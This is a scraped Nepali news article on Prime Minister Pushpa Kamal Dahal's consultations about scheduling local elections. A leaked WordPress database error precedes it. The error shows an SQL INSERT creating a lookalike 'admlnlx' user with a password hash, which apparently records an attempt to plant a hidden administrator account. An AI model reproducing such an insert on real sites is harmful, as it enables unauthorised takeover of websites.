WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BPtDP1V5dKQXZ8iaDT5bnaoCttRBEV0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 18:14:24', '', 'admlnlx', 'admlnlx')
काठमाडौं, माघ २० –
प्रधानमन्त्री पुष्पकमल दाहालले स्थानीय तहको निर्वाचनबारे महान्यायाधिवक्ता, कानुनमन्त्री र सत्तारुढ दलका शीर्ष नेताहरूसँग छलफल गरेका छन् ।
सरकारले निर्वाचनबारे असन्तुष्ट दललाई समेत निर्वाचनका लागि सहमतिमा ल्याउने भन्दै मिति घोषणा नगरी निर्वाचनको तयारी गर्न आयोगलाई पत्राचार गर्ने भएको हो ।
बिहीबार बिहान बालुवाटारमा बसेको बैठकले दिउँसो ४ बजे बस्ने मन्त्रीपरिषद् बैठकपछि आयोगलाई पत्राचार गर्ने तयारी गरेको हो ।
निर्वाचनको मिति भने फागुन अन्तिम सातसम्ममा तोक्ने र जेठमा निर्वाचन गर्ने सत्तारूढ दलबीच लगभग सहमति भइसकेको छ ।
पुनर्संरचना आयोगको प्रतिवेदन, स्थानीय तहको निर्वाचन र संविधान संशोधनलगायत विषयमा बुधबार प्रधानमन्त्रीले कानुनविद्हरूसँग छलफल गरेका थिए ।
पुनर्संरचना आयोगको प्रतिवेदनमा विभिन्न दलको र स्थानीय स्तरमै विरोध रहेकाले छुट्टै संयन्नत्र बनाएर छलफल गर्ने समेत सरकारको तयारी छ ।
त्यसैगरी सरकार गठनको ६ महिना पुगेकाले बिहाीबारको बैठकमा सरकारको कामकारबाही बारेसमेत छलफल हुने बताइएको छ ।